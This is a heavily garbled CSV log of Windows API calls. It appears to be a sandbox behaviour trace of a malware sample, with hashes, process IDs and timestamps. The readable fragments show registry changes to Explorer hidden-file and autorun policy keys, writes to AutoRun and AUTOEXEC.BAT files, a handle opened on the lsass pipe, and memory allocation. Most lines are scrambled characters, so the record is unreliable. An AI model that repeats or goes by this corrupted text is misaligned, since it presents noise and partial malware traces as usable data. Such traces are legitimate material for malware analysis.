S`vCpeS
DnxEmTTryTBOGeE`odPaR
U6ZVcY
gUzvEje"
Pl\L>	
0	S0	T9
"l3"SQ1XR1PR2PV1ST.R^1@
1TW8AN"
"7aC'pS7
R0TS0T
0TX0TS1WR2TV1KV8TD,D
'ilUZN"Se; EScZH""
TAOV:H@eC,^brY
fUNQUb
bTIPSdTL
"c-pqEc+
VfUNWSb
+`{Cu+f
eB7PryD
S6TARP1TO
4R@SW7
DSe;{uScZ
QGeT9[UeC
Z2lCs=22"
HQS0R@CH"X3
$xgZH@Se;'&ScZHF"
.eIUZVx
e]ZJAL_
yqZJDSTCAEWS*,20X7wd
0000","lpFileName,>cdraxi#2
"20190111212121/421&,*1'4
dd688cfe6ceb376d9e53d39jc3fa534jd1bfdd442d6bdca81(0Fcr4
8da744d","1768",#psobers#,#Cse`tgPpoaeqsKnvepnclS"("WUGCASW"("5440&,&ltAtphigapignFaee%> n}ld)*,*lxCgmeafdDife%>S:\WYNTOGS\syste}3
\heLpme.exe
*"281)0
#5'$688coe
cdj3&9d9d$1d
8jc#vc57%bd
coduf42d7bd"`11
fc25b8'`;4%7","076y# "U&ocers"o#_i
Gxec#,"
TA@AVU%,"","
=g}12\H
-201(01
0:1=!21.%01
- 1748","9dd.r:sB/4sgb37
{f'8j`#Nc575bdqcndu
72d'bd
ec2%b8
!,"076
#$"w|lesxst
fadGil
@CERS"
#".!lCoke->0(z2 lz2qXh.2
011021r0:1!
31"="1
:dd'88
a377d9
49d8,bc2gc5
edd542
;181fc
5b:ge223d","
9vuei.2W9gqT.DyneW"
opFile
`oe->C:\DOCUME~10
Vn4\LO;
z^Dd}pH
#,"$v|eg
qedHcc%rc-*
FNESIC
211312q3!.#
2",#17t92,4
gd698c&d&c[
076l9du0t7
`2fk57tfd1bF(f$\~f&cf`e=7?8fc24b8da744d","1768","memory","V`rtualAlfdoHv-<3AFWVSDK;,"0x00154000
~6 8| <*(uCa6g=6z7%;z <**nQd msi8k
.>0y00p1!0$
!,"glP2ndew
.>0y00p1 0$
#20q8 1%
112021n5 16
!1758"l#)dp
;8cge6#dr3#
g9d41dw8rc
`574bdqcvdd
72d6bd#`(1
ec24b8$`'44
!,"176x#<"f
oesyst%l2,
fadFil%#<"S
@CESS"l#2,
Eile->py 00
30a0",bo^uR
frOfBy4dcTo
fad->6q5$0
	"2019p0!12
1121.4p5","
b )ef5<=eam?inn>99t(v&%q!.zc2fc574bd(bfdd44(
8gVi!g2 oQE[
GCwo.2
a xz$nu
a ~~8orU?Mv
mG:$vues4!|y22EG "x|; y|3"Q
3"]c6 Io.2]z6(Na )
)4(T.duZ.gr_z4t
ojVh|e
!nNtmb%sMfBytesToRead->"~6$8m
}3"0"1
:dd788#gg6ceb376d9d51d7i-a"",7'1bd1>)ft\{0t7rdu
;181fcr5Z8r
444m",b0'6.
/"fhle3xcts
!,"Vri4dViF
!,"RUC
!","hF)mu-
{00000p`$"
mNumbe2NvBF
fsToWr)uu->
311121r0"1.
31","1w5:!('9bc>12hjh8leb376d9d% v$-wu%~z/,(
z.BGFG
0fc24b8da744d","1768
*ct2&nu
+6$644r
m3'28",26k|=#{cuum4[!Wrhte
h|e4T!SUBCE
R2,4[/"hGil%,.0nJ30010at#<"x5vmbdrO&Cits
WoWsit%,.6'I70"
"r1!9&O212021r0>4
F!,"174x#<"
g688cf%7se]O46d9d5qe'9]
1fc574"e!bY
g442d6"esa
L;0fc24"<da7
p3'7:!('`ndlyr
ykb2=0AqtrQqle","SUCCESS",""58sZtrz
A~D_QQGyQzytesp>PuQ5/.
vc2!Ya3!]c3"Ic3>
>uc]Sur
fnt^Er3h
kemeMa.`eer"
"20190111"b0!6b,$71",>b5$
q.28td6
c%c#76
:d51d7yca2fc574bd1bfdd4xaf&"7aq=180>00$
kfq6$4q
/"1668b-
jst{y"l#Ber
verxVa,tuEm
!,"GAI
TBE5S!",#hK%x=>'
300100y9:,
sVadue
@omxos)uqnY
":01y1)1
221:1.t3!",
2748",b8td6
;cfe6c%c#76
:d51d7ycs2X
674jd1"g|d
1d6jdc!93;4ff22e0mk<89j-<3#$"-4;:k
|unjmY
v@AhXLD`eyETz
bgpwped
x00000098","
q.2r1ey
 Bi3Se}&{Fy8wu],U24vDQQ
WB]v.2:x xS1{=
vn`r5neA
c}Ay<\E9gRqtto^
311021r0"1;
11"-"1w5("9
:dd788#gu6v
a377d9$4!d"
ac2gc5w5rd$
edd542$7rdv
;181fcr5r8q
444e",b0/6
/"sqst%l:,
ladDib2`jy
/"S]CC
3x5id7p1 0"
!lpFil%Ocna(8rp}bnah k|}0
7$') **-,,.
,"1748","
dd688cfe6ceb376d9d51d79bc2
k|a{<XalpMuxgh=t
;9"-"1w5:","9dd688cfe6c}51':3;t01d7
5a"V47'5rd
2$7rdI
;181fcr5`8da744d","1768v{ `:8auvs",B
#gBd}oa
Whrdadb-2S@
@ESR",b1h0%
300b4"l#|py
brt@dd2dcs
3x0140t1 8
S!th32P2nseN
JD->14p12,"
yExeFi,d=>H
opMe.e8d2
101901q0"12
16.389b-217
;","9d$7(8c
f6ceb3w7t9d
2d79bcrgs57
ad1bfd$5$2d
adca81x1vc2
a8da74te2,"
468","2dwis
qy","R%fSre
weKeyE8V2,"
VCCESSb-20x
30000dp#<"h
fy->HK
BL_MAC
!lpSub
lftWar%]]ic
lsoft\
p NT\C5sben
Uersio.]Gin
311121r0"6.
;9","1w5(",
:dd688#gu6c
a376d9$4!d7
ac2fc5w5rd1
edd442$2bdc!a3(
?a"5b:ge223l+&)=:872=0aqr
dlry","RegSetValu|_xA90"SH]\erq
u.2X Vi
o;2$z3' ` <
`:s^=4s!:1'f<;tiif'Q:a"
t ba>kcd+{20{PuO
pu`de^
zExV",bRECV=PS"-"081 0%I3d4#,"(Juy8DKKEX_L
BQLJ6BCHHNEb-2le/vbKdy-~R_FA*BRE]Mi#s
w\Whnd/vc\}
qrentV%sciQ
_Explo2db\|
uanced
q\Hidd%oLSH5TALL"
B311121r0"6
O;9","1w5("
_:dd688#gu6]
a376d9$11d7	9a"
87'4cf2fcbc<=8o:ojlq)#+$su%,{"
YIJG\DCK
dR_j_Oj\RJ%
AU7	 <Rx.2
v !7m:2,ypug2qdr" <"	gwC)gqt>Iuy
zG.w CY
 <.kz <k2 <?a2 yj[i"/.P
QUJy.2t+Qez
f\Mhcr
rgRe,Tineow
fntWer
hgZM7{plnre
#Shdll
!D212021
)O!,"074
"- :`a0?
m`vfd44
84rd>c(00
14b9da
5<P-\!1778"
ptrx",
fryWal
dMLXQ/"STCC
#V!,"iKe
wE30010d
UalteN
md/=WqguX(r25W "tl; al3"mo3"^s1(M
j6( ,"9
>du7kVs\46d8d5
1fc474
g443d6
ekR)C;0fb24
9lR&G7d"-"1
=Vqeghst
3'fgCsea
dCVh3{W"-"S
CBGPW'*%
VOWSER
wrJmJ"QPofuwa
qosnft
ts\Bur
qsinn\
fr\Rhe
>L311021
!E;9"-"1
49 /&<bcbf:s
;4s	<1'N:;t
<f!`fdd
<fs`02)
fc25b8
`744d","1768
r bggis
|Puf[d{|aludEx
#,"SUCCESS",2}.2jKey1a2h
o2 18erM/"lqVa
f->Rta
u}q3]!dwUyp
,603^!lpEat
,6B+/Goctme
g Sdtt
bneute
brt!Me
u]RqkbtfU,^C0>pd%/ <~<`T	+c=Jn1 
o3)2111
i,#91##M2749",
8le9H;cfd6c
:d50d7
674cd1
gle;G1d6cdc
`24c8d
6<5kW/"1668
wem#,"
o`fOmgtf
2 $P <
rVkleNM
nu2:.uol"
090111212126NS:) ,"1[T:2XB;te>=)bfe6reb
6>a(`51d.9b
3nf$24bd bf
e<1#b6bdra8
98cr54b8}a7
5l'=+176)",
smbxxtry;,"
doJahnKexEx
"- EELJR
)LU ,"l
{=?[niuwart\
bzn|kft\Fi
rSFurrtn
dzrfin\P~l
hmrSBxpl~r
-;019!1
393>96.3)9
#96;5","8d
v89aea3eb~R5&LXf%
0v/T5$:
f$DSf&`dcaDP: 
0$c0gp644d3,"
6>;3("revis
sq!='Reg^pe
JmzT~W",3SU
BMPB%,"0i00
183t9","yKe
,6KZNY_CDRR
O\\D^ER"-"l0St`Ha|+9
pultVeb
mabfds\Eipl
090=4212'.3
8*--77483,"
el77?cfe'ce
2?7k0d51u79
b:gl>74bu1b
el5;?d6becax192eg72e|
c'dVf2p@3'^Z <V
eAwery
,JLU[E",#
Hey$>0x1
at^3e0+, LpVal<eName->OmNetKood"
P4>689"$A3' [ <#
'$];8coe6cdRzs]g9d<1d78
`57=bf
bfdd}42d6bdc`:180ec24b8da744TA.2
T4(jO b`gis
{2@APufo3%
HeyLxW"-
 OURL","#
s,!fy-7HIeY_LO
AL_MACHHLE",!lpSubKey->
.kswoso
qregtVesC +	_Poeicid
slo{ep
"2y190111200126-389","1748
du3ceb#S4t%
1fc<74be
g44;d6be
0|W;0fj26B8da7}4d","177:","qegistry","j
GhR",";1AS17Q2-
s8S30090e0#
k,(fy-7HKEX
6QEN]_WsER",klpSubKex/>Soetware\Micr
mgv\Cu
2gbrI,.=Sol`cierl
oorlr"
ctS:01810
2126g389","1668",!9dd688cfe6
Rf)dP3t29bc*
Q`t0J'$:742m6rdbQ}ug3fc;4r8e
rpTg",+1'
8","registry#."RegQueqyValue
U2`GDQ
)WB@","RI x7
;pl3009e0"-
blulNamd
2SroyepTiesM0Computes 
"10190111212
G3'18",
]:sgEu#?a37?d9d4
-scac2oc575
5u9edd=40D6bdc(8180fc25`8da444d","1768
{2)"ReG)ruB-giDH
bt!FA@LURD
efz/"hBey-?
\LOJAN
NE","lpRwbKez->Software
+ks&	q
^Glndo
qiog\PomY*-
q\Eqplos
1112x2126.388 ,"1448","9dd68
Q4t<d51
3bfmd443T
aa8880fb
fa7=4f
8","reghqtry!,"RegOpenK
GhSE.2C2AS@SS"
."hBey-?x
]CU[RENU
P",+lrsubKe0->Softw`pe\Mjcrosoft\Wi>
mg/;Ae
g~qVer
7m|h[C!%_Exylord
~^]!20890
01212126.389","0748","9fd688
`#26d9
^`s3F uc7bd8bfde
}v05bdja819
7'g7b8ma5
4d",k1768","sggiswry","RegQu
U2)"FAi$WBiJ.2#
fy-70x01
ytbf0"%"lpW
=16Maml-<noInt,rnetIcoo 
"10190111212yZ4>gP;2LJ3'18",ZQft
P:sgEu#5a37?d9d4
-siac2oc575
5u3edd=40D6bdc(8180fc25`8da444d","1768
{2)"Re
bb!FA@LURD
efl/"hBey-?
\LOJAN
NE","lpRwbKez->SOFTWARE
^Glndo_
%>piog\Shd\%
#npa}ibim
BppeiaAtion:\9dd688bde6cfb376d9d51dgP`sn
a%_]`t4bfd
_`tbI{qr3fc;4b8eQ~p~g"
auz221;10
.389k,"1748"- 9dd588cfe6ceb3
P`s7fc5
wr,5bdja819
/'z7b8ma745
shk2761".
regi:try","RdeOpemKeyExW","FA#NE^/ <:H.2mKey
TJ[y3]\Nc
NACAINE#
k(6PubBey-?
>"3tarl\OIcros&ft\Windnus\CvrrentVersi7
qL@xpl
s211;12
|:",+17
~|gd618cFd6ceb376d9d50f79bc2fc674bd1b
aq=180
/"1>68"-
;!Xjst{y",#b-#qsenBeyEy
xhbPUCJESs#,"0x000000e1
vf*Hey$>HkDY_CURRENT_UR
	qm!lpZubkdy->Software\Lk`rosofpYQindo
ay`s\E
29081120
-380","0
/"9md4
ceb376d8f51d49bc2fc574b
4raca8
Y6r9L"w
7d"%"177
qeg`strx
}fhfgQ|epYValu,ExW","F@KLURF","","hKey-R2h<\2 (\g ',"l@:c|I	LqlMn~ylCodmonFB&1Gp"
au	221;10
.389k,"1748"- 9dd588cfe6ceb3oZf)
Y3tGU`s7fc5
4bdja819
6b8ma745
3761".
regi:try","RdeOpemKeyExA","F
N.2mKey
OACAINE#
QubBey-?
UARL\OIcros&ft\Windnus\CvrrentVersig
o`dtibQ
kd=1MrkM 4F_{29D04Guyi
BEA$1068
vr;-0102
B303y9D}"
"32190211212126.3XT <N\5$@O.2<dd6
tvW:d58d79cS{"P674kd1bg
1d6kdaA8180/c24b8da664d"/"1768","re
?gwJpen
	}VRE+,""-
Tz->AKEY^
sO_MHCJiNE",klpSubKex/>Soetware\Micr
mvh2UyF
mgv\Cu2
g~88gbrI,.lSol`cierl
<@oorlr"
:01810
2126g389","1668",!9dd688cfe6
`#CXf)
[3t29bc
Z`t0B%$J742m6bdbQqu
3fc;4b8e
g",+15
8",";egistry#."RedOpenKeyExW
= <'0x0
Iz->AKEY^s
~FNTVUSES
}fAsSukKgY->So/tware\Mharoslft\WindowsD,wbV
pclon\
gc]m;0Flre{"
31182120
;9"%"3
48",k9dd688cgg6cea376d9d51d7I
f!gfdd
ec2=b8d`
}pL!,"8768#
s6Ldis}r{
,"Re.QueryVamweExT","FAILURE
/.5x00
_2 a@ <#L3
GoueGame,
+elnt{olP`
0111{12126.39;","2748","9dd6
HavIFauZC5&a9d5a
v8Fg1bodt45
!:Fgca11(0g
v9G;da>4$E","1768","refkstry","QegOpen3
6CYIURE
Rj[dIiv
IEYVLO
b@HIGE2
WaKep-.
pe\DicRosoft\Windows]AvrrentRersion
S0 )H2!0
226'389#
78"%"9de
i|Bee6je`
76d9-51d79bc3dc577bd1bfdd442\G`t'
:!hAds74b8
r&!,"{egirD;=</"RlgOpd
!fFxW+, sUCCE
S","0x012000f0","hKey->
4LDZUSE
Qeck&9
<SootwasU
arozoft]
mwsUCwRrent
ersion\Qmlicjes\Explore
C2!9B3!4212)@4>
:",+9dd7
g6clb377
3d70ba
fc57}bd1bfdd562d6adca8180fc2t
:t-E6$<P.24768R^ b
kcuR:b
 RenQuesI
weEqW",#
WRE+, 
,"hK,y->0x001200e3","lpValue
vVjlde
yu+221;126/
q}9/"1>48"-
a7x588jfg
beb3m6d9d51d6
:0/ec5>4`D0bfd>442d6bdc`8383fg24b8da74
C5&0Q.2R
eyvtry
KKnFxA+,"
T3CkKP",+0xp1@0
)f2"%"h
d{.>HKEY_CLASSES;!M_$Q.2
QegKey
:FLzB0j&7FE9-3
$59-X2D
-08002W00309D|\InPplcSer
A2!;011
pf<!17=8 ,"9dd788cfe6cdRzs'g9d<1f79bc2gc574bd1c
<7&72d?bbC`818jgc24b8d`
lgw!,"870
#,"r?fistry"- RedUueryValueE
$ <2'WSk1QCbX 2)"hK=
3",+lbValueOame->(nt\)%
";0390111312126.39
0741".
9dd698cfe6cec176d9d51g79bc2f
f$12d6
E: gK+tl;da>46d","1668","refYj0|z",+RggOpenJeyExW",#
LFSS+,$
x000)10e8","iIey-=HKEY_LOCAL
9CSD<LU
Y |uSubw
{=v&{cuM$
gtuy"L
"20190
:9"%"p748","9
:8cgU~'
`37?dxd51d79b
a575J#u
ddd=4sd6bdca8
544m"n
0768x,
 RenQ7EsyVa6u
EFSS+,`
,"hK-y*=8{001
:",+l2value	a
g-=SyrvfiVcs}pInProgr
[1(5T.2
B6(',"9@
du7kti
56d0d51e?(i
e1`fdd442d6bdca8QN2v
D6r=da7LBf2
T3'70#=
reg`st
egOien
","_AI
"",;hK
y->HJGZ[LOCA
Qe`Key
gntJOn
romSet\Control\M
"E2!5G3!0:1
06.:89b-
:",+9d
688cfe6ceb377d9d51d7;bc2fc57
ft142dr
fs1O3(1nc
`8dh74te
568+,"
egistry","RefOpenKeyGxW","SU+4GC'U.25x00
O <#`KO
/>HBEY
]MAJHI
rSukKe9,6Sy
vemUW@
";08y011121
326.391"
3741"%b9dd688
de6ceb255`<b2
F: dc24r@fq/L6t#
48"%"r
{",+Re
Tal|eE
WCCLSS
-"","hKey->0y
20e1",
mpValueName-?qfed"
"6519011uJ3"aJ4>o@;2DZ3'
@ <'9dd
4sdR{s
f9d<1d
a57=bd
bfdd44
f6bdc`
dc2=b8
a744d"
 1768#
eis}ry
*"RegO
gnKeyD
 SUJCEsS","0x000000d:!,"hKey);HKEY_
0K^A[.2p	QegKey
-G]]k,0
321;126/
."1>4:
-"9d>688cfe6b
4d9m53D69bchfc574bd1cffd746d6bdca81\IdsBM`(
 <'176
eyrL;=
."RlgQudJ0
nueLxW"-
AESZ".
ey->0x01
g8"%"nPWalu?Name->OsMocdfrTath"
K3">T1(<","
afe?cec2os 
f51m79bbj#'
54bm1rfef472d6bdca8180f/H6r`
c'PNf2)"17FB <^
 ,"[egPt=u<
clulEzG","S]CCESS",#zif
Iey$>&x000078e8","lqTaoueName->OsLo
;",*1749
fd608cFl6ceb3
4d9d50d79bc2fa574bd1b
f$<If&gdca
64d+,"16
 renists
PegFpgNKeyE1W","SUCBGSS"/"0x000000e|Y.280giqEJ[@Y_L;8C\
."lySubJU0i
QYS]EM\R
9011x212126.2:9",!1748","9dd
1'3d9d
a"gCvw
`d1kfdd5
`dch8181
`8dh76
d","x768","rdeistqy","RegQue
Tql	gUt+ <'SUCg9QC
{->9x0p1
:",+lb6alueOame->SysuemPcrtition"
nN2!aL3!4212AN4>OD;2-
:",+9t$7
g6clb3w7
3d70bqRfc575bd1bfdd562d6adca8180fc2
^.24768
kcuBxg
 RenQu%s
weEqW0L"SUCBESS","",#hKe{->0x000000
rFdlue^
ou1CQirTd,
crt`ty/o
001001q0
06.:8+B,"1758","9dd7:8cff6ceb376d9d
7'1bd1
ftDI0t6beaa82<0fc2
:tIJ6$
K4( ,"r
MpegKu9DHVg
 SUJCE
z0090"Pe8",#hKey->HJGY_LLCAL_MACHIN
6gi(>So
^]hCs.
mftUWy.e_v6
Aur{en4W
mn\Zef
#20190110012116.389","178F <:Gft
F:sce6cY
`c2oc%w5Ret
ddd=42$7
:189fqR4b8d`744d","0568"/"registry"H\Pu
TqiueE
-WSCERS ,!","hK
2 0N2 g8",
wuOAl$
<So|rs%QQu-
";01y1
321;6<S89",#1748","8fd68;cfe6ceb376
0vf574r
fca11(pgS3q
:da>44$#
48"%"`
gistsy","RegPweryUalueExW","k*AS
,Q2|] <'hKe
 ,"epF!mEd
oe-7So5s
0R0190011212127,389!,"1748","9
gr676d
H;rc2gc777bd1bf
c(380f
 17?8 ,"reghstry","SU.
gnKlyGxW","RUCCESS"-
20090g8","hJey->HKEXo
CL_DAAHINE"-"lpSubKd
mft~apE\Micsosoft\Wh
q\C|rpEntVession\Seu
111202126.388 /&1748")$>dd684
6ra1bf
4reC"x
:0fj24
6d"%"1
peg`st
ggQ|erYWalueExW","ST
Q",+",
iKey->0x000012f8","lpRdlueNa
ps`Pat(
012826
389","
548",#	v 
:8coe6
eb376d
f51d78
a57=bd
dfdd44
f6bdc`:180fc24a8da744
 b`gis
Pufa<!
{VaeueEy
QUCJEQs",""e"hKey->0y000200e8","lpV
ou(>Sev
csjc&1
aePhth"
390813
.389","1648"."9dd688cfe
4t<d51(
3bfmd443T
aa8880fb
fa7=4f
8","reghqtry!,"RegOpenK
AS@SS"
&x]."hBey-?x
&]LOJAL_L
LE"%"nPSubK,y->Softvcre\Nicrosoft\W
puktVe
QuuU3bp
"291900
xvL012?.388
}fO548+, 
dd68qcfe6ceb256d9g51d79bc2fc
6$7d6b4
w"Cfa7=4d"-
xsM:",+regh
 ,"[eequery
alueExW#."SU@CESS","","
2 50e8
g->ZervhS,
akChcheQ
0111{12126.39;","2748","9dd6
5&a9d51
f1bodd45
fca1180g
:da>46D","1~68","refkstrz","RegQuerQ
.2VUCC
/>0q0001
y!M ,"epVam
oe-7SgRvice
ackCachdRath!
"2019011
;2)"17
g6clb377Tp F3d70bc2g
ds@`d1kffD442d
bdca8181dc24a8da744d","
kcqry"$
ruok&94zW"%"SUBs
" ,"9x001
:",+hIEy->H
EY_LOCAM]MACKINE","lpSuR
uqwe\M	
dd]w+.
mwsUCursU'09grs`on\R
9011x212126.2:9",!1748","9dd
1'3d9d
a"gCwwY`d1kfdd5
{ [`dch8181
2vZ`8dh76
d","x768","rdeistqy","RegQue
 <'SUCS
{->9x001
:",+lpV`
$!"cme$>FRiver
achePati 
"10190111212	
3'18",J
`37?d9d4
-s]`c2oc575R,u
ddd=42d7J#'
:189fc25
544m".
0768x,"regisu
!qD RenQwEsyVa6ueExW",#
)GSS+, 
,"hK-y->0x001
:",+lrvalue	ame->DrhtfvFgd`ePath"
ft388cF
1'7Lp n3d70bc2gS|sh`d1kfdd5
z h`dch8181N$vi`8dh744e
tqn568+, Rdgis.ry","Ref
IeyLxU
CESS","1
atR200l8 
"hKe1->HKEY_M
-]MAJHKnE","+pSubKey,<Pkcrpire\Micro/
 "5190
z|j ,"8748#
k}0f681cfe7S-&e56d0d51e
~&60fc<74be
:53f44;d4Beca8k80fc24b9
9dl6d"%"3
78",xregistrx
ggQ|epYValu-ExW","ST
Q",+".
hKeyj>0x000012f<'*%dpValueNaE
0&+389
p /488jfe6bU+w{4d9m51d6	*'|dc5>4bd0J! )642m6bdb
`bw2fc;4`
ea74nd","1769
tq#{ncarmNhzat3on","Crd
wteqW 
ESS","0y
ata20e=".
lpNa*e->(nulm+!	
$5819011121
`#26d9
`s3V*qr6bd8bfde
}v"4bdja819
/'u6b8ma745
j3761",
rynchronizath
4qe CrlatELutexW","SUCB
h."0q00
100f0","lpNalg.>(nulh,$
:2)"9dH
g&bU*w
4d9m51d6	+'
dc5>4bd0R. $642m6bdbQ
2fc;4b8e
lgwf",+17
9","synchronh
;0-mn"%"CRdateMutexW",#
GSS+, 
x000x00f8","m
%,g->!nwLl)"
M"20190103152170);89","1W
`s7fc5
}vQ4bdja819
6b8ma745Tjh
3761","sM -Dvry+,"Rd
#\lKepEzw#,"S
CCESS",#
2009fa
-"hK?y->HKEY^
}N_MHCJiNE",jlpSubKex
Tdtwhrg|Micr(soft\WioflsvZD}rrentVer_
:)',"1
q|Nde6jeb36
-}J71d>9bc3V+q
6bd8bfde
svK4bdja819
6b8ma5
5d",x1768","s
?:Avry+, rdgQu?ryValueD
 SUJCGsS","j,"hKey-?
2009fa
alueNamd/=HjaKmvel"
4(=cfe
4t8L|uM59bj2fc4
}&N3bfmd443
n1Oaa8882Fb24bbda744d"-
:",+rgGhstr#","RegQtgryUelueExW","S
gi(>0x<
k(UTal|eNalUdzjmgLlvel#
219913
3121h6.389",#
 ,"0df
98cf?6ceb376e;d52`79bc2fc574Z
aq=180
."1>68"-
;!Ekst{y",#
=4rwerpVcLteEx
","FAILT
 ",+hIEx->0"000000fb ,"otValueName-
3)5111
kh?3741","8T-r&:cfl6cec
oe{;d58d5
cc2f9574bd1bg
0d6kdaA9180<c24b8da664d!("1768","reG
g~NeyE
;.""%"hKdQjz*z009000g
>npS|bKEx->AppLogLevd
1112v2126.388"."1778&,"9dd68
7!a79b
+"qf44;d6beK&|':0fj24b9
;d,6d"%"1
78","system"-
+vfLikrcRyA",eSUCCESS#, 0x74960000","d
VEUAPI~
x}=311;1213
gw6;",+1749
df)fd618cfd
$!m176m9d50
mjqa2fj57
cd1bfdd442d6c
92,380oc2
c8da744d","16
if> reniqTry",jRegOpenJ
iU",+FCiLUREe,"","hKd{.:HK@_XDOCAL_M=
abjsofx
RqfM!N|dfe{s2
w<;;0181"
a;%189+,2
648","9dd688b
6;ogb3>6t
e51d79bc2fc566bd1bfdg042d6bd+
5$1d",
.-tvry+, RegOpdnKeyExA#
]ACEZS 
"0x010000fc",#hKey->HIEY_LOC
JYKE",
jdtwhrg\Micrnsoft\Rpb
DN$001003
1212026.389",#1748",";dd688cv
1'3d9du
a"g3|s7`d1kffd442d7bdca8181
*v0`8dh76
d","0768","refistry", RegOpe
U2)"FA
.2#|k,Jgy-7HIEY_LOBAL_MACHH
f. lpZu`key->Roftware\Licrosofv\Windo
Aewren
d F`lg Execttion Opu
&*s^9dm6:
cfe6beb376d9d41d79bc2dc574bd=
6"a6bd_
`74=dZrpcTh;7adPoolThrotule"
"2019P
3!7121J
#,"0db
98cf?bceb376d9d51e79bc2fc574
3rcdd4
b24k8bA644dxx"1768","reghstry","Reg
g~NeyE
-""%"jKey->IKEY_LOC@
BHIGE$
"lpS<cKey->Sogtwape\PoliciesT
+22190110212126.2
#17=8$
98cfe6cec376f9d51d79bc2:
f!gfdd
fs`px|
gc2=b:da744e","1768#
rted"*
hbraryW"-"SUACESS","0x7
22)"lp
ou,v;4
st4'dnl"
"301901113
7.319$
#174b#,"9dd689cfe4ceb376d9d55
0vf574V
f$5zvr
eca11:4fc24c8
`744d#
78"%"`Ijesy<u
l","CrdateDileW","SUC
  }000
dNade/>\\.\QIPE\lsas
#dwMeuIredA$bess->GEOERIA_READ | GE
UBLTE"
; 0y)v
312?.189","0748","9e
bfe?ccB376due51d79bc3fc554bd1bfdd442
c(480fS
#17?8 
2fildsystem","CreateFhleW","
AS@SS"@
-"lyFoLuNam,,>C:\9dd688cge6ceb376d9
3t29bc
`t0*"v
542m6`dca8190fc24b8e
e",+dudesirddAccess-?GENERIC]READ"
2!4121
:)#df#
58"%";`d688bf
7ceb36
41d>9`C0fc564bd1bfdd542d6bdcc8180fc*
5$1d",j
.2g!(~
xstlm ,"ReaeFile","R
RS"%" 
"hFime->0x000100cc","lNumber#
qDjRea
1&#EN8
1199131212136.399",#
#,"0df
88cfd6ceb376d8d51d79ba2fc574
f$12d6
: g#qt
9da>46d","1668","fim%:=
uem+, WriteGile","ST
R",+"*
hFil,,>0x00012128!,"nNumberOr
kd`->6i
011;10126.389","1749
ed618eFe6ce+276d9d51e79ba2fc574bd1b
f&gdca
0$cp-%
54d+, 1768"-"filesyr
-"Rlabfhle"v#SUCCESS#,""."hFile->0x
as',"nF
MvC1=!
UoRlaf->65526"
021;14
/399x-"1748",#9dd488cfe6ceb3
3t29bcn
`t0*. 
542m6`dca8190fc24b8e
e",+11
8",".hlesystel","UriteFile",
QC',""
g=?x?t
10082:","nNtmberOfBx
nWr`tc
>655t7"
"20180113212126.399
:2)"9d`
g&b-+w
7d9m53d79bc3fc574bd0
542m6`Dba8190fc24b8d`744d","3768","N
qd`m",z
k|djef
TCCLSQ","",#hFile->1
100jc 
#nNulberOfBytdsToRead/>65536^
3)5111
0741"*
)dd6n9cfe6ceb376d8d51d79bc2f
5$gd1b
080oc0
c8da644d","1768","fildsystem*
 Gwitef
oR",+".
iFild->0x00000128","nOumberO&
{d`sTo
<&5536#
	"657>88;:2121>; <)(","174*18"9dd688cfe6ceb376d9d51d79bc2fv# 4zd1bfd}./2d6bdca8180fc24b8da+)*{","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748
,"9dd688cfe6ceb376d9d51d79bc2fc574bd]
0!399'
299+,"
#9dm68
bfe4ceb376d9d51d?
a%24bd
6"e>so
`8110f
`74=d"
#1748","filesyst!
gqaFil9
#",+hFim
y00902
cc",knNumberOgBytgsToRead->6
8",+1749
ed618aFe6ce+376d9d51e79ba2fc574bd1b
f&gdca
54d+,"16
#fieeqYstemk,"WriteFhle"."SUCCESS",2
k|`->0L
OumkerOg
rTo^rkTe->6|536"
"21190311212126.3a
5$=","E
276m9d50
b2fj57
bd1bfdd442d6beca8180fa24b8da
 !268"
-"Rlaffole"|"
TCCESS",""-"hFile->0x
2 50cc"
xtezTmrbad-d6
"20180111212126
;)',"1
ge6je`
16d945
e79bc2fc575bd1bfdd442<
`tfa81H
e",+15
?","<i
dsystem","VriteFile",
WSFESS
1x0902
728"|"
OumberOfByuesToWrite-
026'3;
%,"1m4
#,"9dd688cge6ceb376d9d
3t29bc*
542m6`Dea81h0
b24b8da744e","1768","^
nuvyst5
#,"ZUAcBSS"v"
-"hFile->0y000000cc",R
Lehber
,>6<51
80111212127.399","174
.2<dd6
8d58d5
ec2f95
5bd1bfdd443d6bdca8180
0$g8da
#fieeqYutemr,
VriteFile"-"SUCCESS",:
.2mFilU
#,"gNwMeerO<B
uesToWrite,>20342"
3)5111Z
0741".
?dd6h8
ge6ceb376d8d51d79bc2f
5$gd1b
080oc0
e8dam4
e","1768",#filesystem
 B`adF
#,"+, H@ile}>
y000000cc"-"nNumberOf
vuvToRu
#20892
6121h1
7.399","1758","9dd688S
g&feb3
gc5>4`D7bfd44
3d6bdca8181fc24b8da74\
 <'176
l",+CmP~Fil?E
V","SUCCESR","","lpEx
vykgFi
e681cdE1cebi7
e9d51d79bc3fc574bd1bf
6$7d6b
ea7=4f
GileName->B:\AutoRun.u
/390".
7748r,
8dd688cfe6beb376d9d51,
;rf2fcU
e6bmcc
680f92
c8da744d",#1768","fil
{cqem"
#,"ZUAcCSS"|"
y000000cc"-"lpFileNam
<S?\9d
7d9m53D09bchf
474bd1bfdd542d6bdca81
ds74b8l
rirldCCeess}>
DNERIC_REAE"
"201901
0!7126n
#9dm6:
dfe69e
276d9d51d78bc2fc574bdQ
dta442
5b8ma5
2d",r1
78","filesxstem","Rea
k|`","
iFiee/
7x00j0
1cc","nNumcerOfBytesT
gqa->2
021;10
)399x,
0748","9dd788cfe6ceb3?
f)a51d
cfdm46
c6bd9a
080fc24b8d`744d","176x
.2cile+
 <#3]h
ueF`leV"-"SUCCESS","0x0H
2 5cc"
?C:UAUUODXEC.BAT","dwDe
puaAcc
111821
126.399","1749","9dd6:8cfe6c
;t01d7
7'5*-u
gdd=42d7
9189fa
4b8d(744d","1668"."filesysteu
ctCile
#,"aFild
100902Cc","'NumberOfCyteqToRead->26X
2!<011
4>2qpfR#17=8",#
5 I98coe4Ceb37
d9d51d79cc2fa574bd1bfdd
fsd818
#,"8768#
mespsvEm","
reateFildW", SUCCESS","
2 fc",6
g^`%,iDB:\0dd69
7cek35
d9d5xd79bc2fc474bf1bfdd442d6Z
: cc24>
6t#dk 
Ees`red@
r->NELeRIC_
"21190311212126.3
5$=","
avd~*!
276m9d50
b2fj55
bd1b/dd442d6beca8380fc24b8da
 !268"
qir<,)V-"C{eatd
V",+SWcCESSk,"0x0000112c ,"lpFileNa}
^QPTOEl
V2-j-36dsi{edAb
,>GLNGrIC_R
"20090131212126.39a
